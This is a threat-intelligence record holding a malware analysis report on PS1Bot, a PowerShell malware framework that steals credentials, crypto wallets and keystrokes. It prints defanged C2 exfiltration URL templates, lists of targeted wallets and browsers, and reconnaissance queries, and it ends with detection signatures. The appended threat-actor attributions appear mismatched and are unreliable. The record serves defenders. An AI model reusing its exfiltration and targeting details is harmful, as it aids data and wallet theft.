{ "id": "f9fc09f3-035b-44c2-bdb1-33ba91f940c5", "created_at": "2026-04-06T00:14:45.107735Z", "updated_at": "2026-04-10T03:37:09.306105Z", "deleted_at": null, "sha1_hash": "af771e2a33fc545ce7a4a2a0f89910843eb484c0", "title": "Malvertising campaign leads to PS1Bot, a multi-stage malware framework", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1607785, "plain_text": "Malvertising campaign leads to PS1Bot, a multi-stage malware\r\nframework\r\nBy Edmund Brumaghin\r\nPublished: 2025-08-12 · Archived: 2026-04-05 21:52:41 UTC\r\nCisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage\r\nmalware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”\r\nPS1Bot features a modular design, with several modules delivered used to perform a variety of malicious\r\nactivities on infected systems, including information theft, keylogging, reconnaissance and the\r\nestablishment of persistent system access.\r\nPS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and\r\nincorporating in-memory execution techniques to facilitate execution of follow-on modules without\r\nrequiring them to be written to disk.\r\nPS1Bot distribution campaigns have been extremely active since early 2025, with new samples being\r\nobserved frequently throughout the year.\r\nThe information stealer module implementation leverages wordlists embedded into the stealer to enumerate\r\nfiles containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the\r\nstealer also attempts to exfiltrate from infected systems.\r\nCampaign Overview\r\nCisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The\r\ncampaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework,\r\nimplemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on\r\nmodules including an information stealer, keylogger, screen capture collector and more. It also establishes\r\npersistence to continue operations following system reboots. The design of this malware framework appears to\r\nattempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with\r\nthe malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”\r\nThis campaign has been extremely active, with new samples being observed continuously over the past several\r\nmonths. The cluster of malicious activity associated with this campaign also overlaps with prior reporting,\r\nincluding reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection\r\nchains we analyzed, the PowerShell implementation described in that reporting appears to match the components\r\ndelivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2\r\ninfrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported\r\nmalvertising campaigns.\r\nDelivery\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 1 of 21\n\nThe victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent\r\nwith what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns,\r\nwhere the file name matches the keyword phrase being targeted in the campaigns:\r\nchapter 8 medicare benefit policy manual.zip\r\nCounting Canadian Money Worksheets Pdf.zip.e49\r\nzebra gx430t manual.zip.081\r\nkosher food list pdf (1).zip.c9a\r\npambu panchangam 2024-25 pdf.zip.a7a\r\nPrior reporting on social media further strengthens this assessment, where researchers have observed the\r\nmalvertising campaigns leading to the compressed archives delivered in this campaign.\r\nInside of the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader,\r\nretrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a\r\nvariety of obfuscation methods throughout 2025. Below is an example of one of the more simplistic examples\r\nobserved recently.\r\nFigure 1. Deobfuscating the downloader script.\r\nStage 1 retrieval\r\nWhen executed, the malware retrieves a JScript scriptlet from an attacker controlled server, the contents of which\r\nare then executed. \r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 2 of 21\n\nFigure 2. Example JScript scriptlet contents.\r\nThis script is responsible for performing the environmental setup needed for subsequent malware operations to\r\nfunction properly. This includes writing a PowerShell script to C:\\ProgramData\\ ( ntu.ps1 in this case) and\r\nexecuting the script contents written to the file created in the previous step and redacted for space in the previous\r\nscreenshot. This PowerShell script obtains the serial number of the C:\\ drive and uses it to construct a URL, which\r\nit uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious\r\ncontent to execute. Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed\r\nwithin the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each\r\niteration.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 3 of 21\n\nFigure 3. PowerShell module retrieval and C2 polling.\r\nThis allows the malware to continue to run, periodically attempting to poll the attacker’s C2 server to retrieve\r\nadditional commands to execute within the PowerShell process running on the system. We have observed this\r\ntechnique used to deliver a variety of additional modules, each enabling the attacker to conduct additional\r\noperations on the system, obtain additional environmental information about systems under their control, and\r\nenable the theft of sensitive information such as credentials, session tokens and financial account details\r\n(cryptocurrency wallet data). \r\nPowerShell modules\r\nWe have observed the delivery of the following types of PowerShell modules during and after the initial infection\r\nprocess. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes\r\nthat are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey\r\ninformation, keylogging, and screenshot capture.\r\nAntivirus detection\r\nScreen capture\r\nWallet grabber\r\nKeylogger\r\nInformation collection \r\nPersistence\r\nIn most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the\r\ninstallation and runtime status during and post-deployment. In most cases, these status updates are delivered to the\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 4 of 21\n\nC2 server in the form of URL parameters that are included as part of HTTP GET requests to the URL used to\r\nestablish an initial C2 connection. \r\nWe assess with high confidence that additional modules likely exist and are deployable as desired by the\r\nadversary. The modular nature of the implementation of this malware provides flexibility and enables the rapid\r\ndeployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot\r\nthroughout 2025, we have observed development activities occurring over time, indicating that this is a rapidly\r\nevolving threat.\r\nAntivirus detection\r\nThis PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting\r\nthe antivirus programs present on the infected system. This is accomplished by querying Windows Management\r\nInstrumentation (WMI) to obtain a list of installed antivirus products.\r\nFigure 4. Antivirus detection logic.\r\nThe returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the\r\noperation as URL parameters.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 5 of 21\n\nFigure 5. Status logging implementation.\r\nThe following is an example of the URL structure used to transmit the information to the C2 server:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?k=result%20=%20Windows%20Defender;%20%20status%20=%20success\r\nOnce this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until\r\nadditional instructions are received. In several cases, we have observed the delivery of several distinct PowerShell\r\nscripts during the infection process. To facilitate delivery of new PowerShell scripts, we have observed that the\r\nattacker simply manipulates the response content associated with the C2 URL derived initially. Each time the\r\ninfected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.\r\nScreen capture\r\nOnce antivirus detection has been performed, we have observed the delivery of additional PowerShell modules,\r\none of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server.\r\nThis is often performed for a variety of reasons, including to identify when systems may be in active use by\r\nvictims versus unattended or to collect sensitive information that may be displayed on screen but not otherwise\r\nrecorded for easy exfiltration. \r\nIn this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at\r\nruntime.\r\nFigure 6. Example use of Add-Type for C# compilation.\r\nThe resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside of the %TEMP%\r\ndirectory. The image is later converted and stored as a JPEG at %APPDATA%\\Screenshot.jpg .\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 6 of 21\n\nFigure 7. Screenshot generation logic.\r\nThe content stored within the image file is then Base64 encoded and the resulting data is then transmitted to C2.\r\nThe image files in both %TEMP% and %APPDATA% are also deleted.\r\nFigure 8. Example HTTP POST containing Base64 encoded screenshot image file.\r\nAdditionally, status logging messages are sent to inform the attacker of the module’s progress, an example of\r\nwhich is shown below.\r\nSuccessful Screenshot Collection:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?\r\nk=script:%20screen,%20status:%20OK,%20message:%20screen%20uploaded\r\nFailed Screenshot Collection:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?\r\nk=script:%20screen,%20status:%20error,%20message:%20[EXCEPTION_INFORMATION]\r\nGrabber\r\nFollowing successful collection of screenshots on infected systems, we have observed the delivery of an\r\nadditional PowerShell module that the attacker refers to as the “grabber module” that is used to steal sensitive data\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 7 of 21\n\nfrom infected systems. It is designed to target the following types of data that are then exfiltrated to the C2 server:\r\nLocal browser storage (stored credentials, cookies, etc.)\r\nBrowser extension data for cryptocurrency-related extensions like wallets\r\nLocal application data for cryptocurrency wallet applications\r\nFiles containing passwords, sensitive strings or wallet seed phrases\r\nThe module begins by checking the values of variables that were declared in earlier stages of the infection\r\nprocess. If the script is not being executed within the context of the PowerShell process established earlier, it will\r\nfail and terminate execution.\r\nNext, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the\r\nattacker that the grabber module is running and to provide basic runtime information. Log messages are\r\nperiodically transmitted during the execution of this module to provide ongoing status updates, error alerting and\r\nother relevant information throughout the execution process.\r\nThe malware first checks for the existence of various installed applications of interest, including browsers,\r\nbrowser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for\r\nstaging. \r\nThe malware specifically checks for the existence of application data associated with the following web browsers:\r\nGoogle Chrome Chromium Kometa\r\nMicrosoft Edge 7Star Maxthon\r\nOpera Atom Mustang\r\nOpera GFX AVG Secure Browser Netbox Browser\r\nBrave Avast Secure Browser Orbitum\r\nVivaldi CCleaner Browser QQ Browser\r\nYandex Chedot SalamWeb\r\nSlimjet Chrome Beta Sidekick\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 8 of 21\n\nEpic Privacy Browser Chrome Canary Sleipnir\r\nComodo Dragon Citrio Sputnik\r\nCentBrowser CoolNovo Superbird\r\nNaver Whale Coowon Swing Browser\r\nSRWare Iron CryptoTab Browser Tempest\r\nBlisk Elements Browser UC Browser\r\nTorch Iridium Ulaa\r\nCoc Coc Kinza UR Browser\r\nAmigo Wavebo Viasat Browser\r\nIn addition to the previously listed browsers, the information stealer also checks for the installation of the\r\nfollowing Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor\r\nauthentication (MFA) authenticators:\r\nMetaMask Trezor wallet-guard-protect-your\r\nMetaMask-edge Ledger subwallet-polkadot-wallet\r\nMetaMask-Opera Mycelium argent-x-starknet-wallet\r\nTrust-Wallet TrustWallet bitget-wallet-formerly-bi\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 9 of 21\n\nAtomic-Wallet Ellipal core-crypto-wallet-nft-ex\r\nBinance Dapper braavos-starknet-wallet\r\nPhantom BitKeep Kepler\r\nCoinbase Argent martian-aptos-sui-wallet\r\nRonin Blockchain Wallet xverse-wallet\r\nExodus cryptocom-wallet-extension gate-wallet\r\nCoin98 Zerion sender-wallet\r\nKardiaChain Aave desig-wallet\r\nTerraStation Curve fewcha-move-wallet\r\nWombat SushiSwap kepler-edge\r\nHarmoney Uniswap okx-wallet\r\nNami 1inch unisat-wallet\r\nMartianAptos petra-aptos-wallet xdefi-wallet\r\nBraavos manta-wallet rose-wallet\r\nXDEFI TON Authenticator\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 10 of 21\n\nYoroi Tron\r\nIf discovered, associated extension data is staged using a process similar to that described earlier for web browser\r\napplication data. The information stealer also attempts to locate locally installed cryptocurrency wallet\r\napplications and MFA applications, including the following:\r\nAuthy Desktop Atomic Armory\r\nExodus Electrum Bytecoin\r\nCoinomi Daedalus Ethereum\r\nBitcoin Core Ledger Live Guarda\r\nBinance Zcash TrustWallet\r\nOne interesting piece of functionality included with the information stealer is a scanner that is designed to identify\r\nand exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We\r\nhave also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech.\r\nAdditionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet\r\nseed phrase combinations.\r\nFigure 9. Wallet seed phrase wordlist.\r\nThis wordlist is designed to be used to identify files that may contain cryptocurrency wallet seed phrases, which\r\ncan be used to regain access to wallets in the case that the primary authentication method is unavailable. This is\r\nperformed by iterating through the file system on local hard drives, identifying files matching specific file\r\nextensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist. \r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 11 of 21\n\nFigure 10. File scanning parameters.\r\nIt also attempts to identify files that may contain passwords.\r\nFigure 11. Password file detection criteria.\r\nOnce the sensitive information has been collected, it is then compressed and exfiltrated to the attacker’s C2 server.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 12 of 21\n\nFigure 12. Compressed archive exfiltration logic.\r\nData compression and exfiltration is performed via an HTTP POST request, as shown in Figure 13.\r\nFigure 13. Example HTTP POST containing compressed archive.\r\nAny discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format\r\nsimilar to the one in Figure 14.\r\nFigure 14. Transmission of detected wallet seed phrase contents.\r\nThis demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.\r\nKeylogger\r\nThe keylogging and clipboard capture module is implemented similarly to the screen capture module described\r\nearlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime. \r\nFigure 15. Example use of Add-Type in PowerShell.\r\nThe keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of\r\nkeystrokes and mouse activity on the system.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 13 of 21\n\nFigure 16. Example SetWindowsHookEx() logic.\r\nClipboard contents are also monitored so that information copied can be dynamically logged as well. As with\r\nother modules, status logging has been implemented and is performed via HTTP GET requests, an example of\r\nwhich is:\r\nhxxp[:]//[C2_SERVER_IP]/[DRIVE_SERIAL]?\r\nk=Module:%20KeyLogger,%20Status:%20running,%20Message:%20Logger%20started%20with%20PID%209164\r\nThe module also relays this status in the body of an HTTP POST request.\r\nFigure 17. Status logging transmission to C2.\r\nCollected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 14 of 21\n\nFigure 18. Keystroke log transmission.\r\nInformation collection\r\nWe have also observed the delivery of a system survey module that the attacker refers to as\r\n“WMIComputerCSHARP” that is used to collect and transmit information about the infected system and\r\nenvironment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is\r\nimplemented using a combination of PowerShell and C# and features the use of runtime compilation. \r\nThe module uses WMI to query the domain membership information of the infected system, likely to enable the\r\nattacker to perform reconnaissance to determine if they were successful in gaining access to a high value target.\r\nFigure 19. Survey collection status logging message.\r\nThe following WMI queries are performed as part of this process:\r\nSELECT Domain, PartOfDomain FROM Win32_ComputerSystem\r\nSELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL\r\nIn addition, the %USERDNSDOMAIN% environment variable is also queried to attempt to enumerate the domain\r\nmembership of the infected system. The collected information is transmitted to the attacker’s C2 server, consistent\r\nwith what was described for other modules.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 15 of 21\n\nFigure 20. Example status logging implementation.\r\nPersistence\r\nWe have also observed the delivery of a persistence module that can be used as desired to ensure that the main\r\nlooping mechanism is re-executed following a system restart or user session termination. This allows for the\r\nreestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the\r\nadversary.\r\nThe module begins by attempting to create a PowerShell script that will be executed each time the system restarts.\r\nThe module creates a randomly generated directory within the %PROGRAMDATA% directory that will be used to store\r\nthe components needed for persistence. These include a randomly-named PowerShell script (PS1) as well as a\r\nrandomly-named shortcut file (ICO). A malicious randomly-named LNK file is also created in the Startup\r\ndirectory that is configured to point to the PowerShell script previously created so that it can be executed each\r\ntime the system is rebooted.  \r\nFigure 21. Persistence module file creation parameters.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 16 of 21\n\nThe ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script\r\ncontents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the\r\nURL path /transform .\r\nFigure 22. Persistence payload retrieval.\r\nA simulated example of this process is shown in Figure 23.\r\nFigure 23. Simulated delivery of obfuscated persistence payload.\r\nThis content is then written to the PS1 file and the LNK file is generated with the appropriate parameters to enable\r\nexecution in the future. When deobfuscated, the contents of the PowerShell simply contain the same logic used to\r\nestablish the C2 polling process previously described early in the infection chain.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 17 of 21\n\nFigure 24. Deobfuscated persistence payload.\r\nWe assess with high confidence that there are likely additional modules available for deployment as-needed by the\r\nadversary and the use of this framework provides a flexible means to enhance and increase the functionality\r\navailable rapidly as needed.\r\nLinks to previous intrusion activity\r\nDuring our analysis of the code and functionality associated with this infection chain, we observed similarities\r\nwith components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules\r\nto infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and\r\nthe one described by the aforementioned reporting. Additionally, we assess with high confidence that the final\r\ndeobfuscated payload dropped by the persistence module previously described was likely created by the same\r\nentity who created the PowerShell script described in the prior reporting. The overall implementation, use of\r\nspecific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a\r\ncomparison of the code in both instances.\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 18 of 21\n\nFigure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).\r\nAs observable in Figure 25, the only difference between the two samples is the addition of mutex handling and\r\nsleep periods.\r\nWhile Talos did not identify any direct overlap in activity related to these malware families, we noted similarities\r\nin the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present\r\nin another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path\r\nbased on the drive serial number is consistent across both malware families. Likewise, the use of a main polling\r\nscript and subsequent delivery and execution of purpose-built modules is also similar to the design architecture\r\nfound with AHK Bot. There are also several similarities in the types of modules available for both malware\r\nfamilies. Heavy use of URL parameters when communicating with C2 is another similarity between the two\r\nfamilies.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.  \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.  \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 19 of 21\n\nthreat.  \r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.  \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.  \r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. \r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work.  Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access.  \r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.   \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.   \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.  \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.   \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. \r\nSnort SIDs for the threats are: \r\nSnort2: 65231 - 65233\r\nSnort3: 65231 - 65233\r\nClamAV detections are also available for this threat: \r\nWin.Backdoor.PS1Bot-10056514-0\r\nWin.Backdoor.PS1Bot-10056515-0\r\nWin.Backdoor.PS1Bot-10056516-0\r\nWin.Backdoor.PS1Bot-10056517-0\r\nWin.Backdoor.PS1Bot-10056518-0\r\nWin.Backdoor.PS1Bot-10056519-0\r\nWin.Backdoor.PS1Bot-10056520-0\r\nWin.Backdoor.PS1Bot-10056521-0\r\nWin.Backdoor.PS1Bot-10056522-0\r\nWin.Backdoor.PS1Bot-10056523-0\r\nWin.Backdoor.PS1Bot-10056524-0\r\nWin.Backdoor.PS1Bot-10056525-0\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 20 of 21\n\nWin.Backdoor.PS1Bot-10056526-0\r\nWin.Backdoor.PS1Bot-10056527-0\r\nWin.Backdoor.PS1Bot-10056528-0\r\nWin.Backdoor.PS1Bot-10056529-0\r\nWin.Backdoor.PS1Bot-10056530-0\r\nWin.Backdoor.PS1Bot-10056531-0\r\nWin.Backdoor.PS1Bot-10056532-0\r\nWin.Backdoor.PS1Bot-10056533-0\r\nWin.Backdoor.PS1Bot-10056534-0\r\nWin.Backdoor.PS1Bot-10056535-0\r\nWin.Backdoor.PS1Bot-10056536-0\r\nWin.Backdoor.PS1Bot-10056537-0\r\nWin.Backdoor.PS1Bot-10056538-0\r\nWin.Backdoor.PS1Bot-10056539-0\r\nWin.Backdoor.PS1Bot-10056540-0\r\nWin.Backdoor.PS1Bot-10056541-0\r\nWin.Backdoor.PS1Bot-10056542-0\r\nIndicators of compromise (IOCs)\r\nIOCs for this threat can be found in our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nhttps://blog.talosintelligence.com/ps1bot-malvertising-campaign/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.talosintelligence.com/ps1bot-malvertising-campaign/" ], "report_names": [ "ps1bot-malvertising-campaign" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", 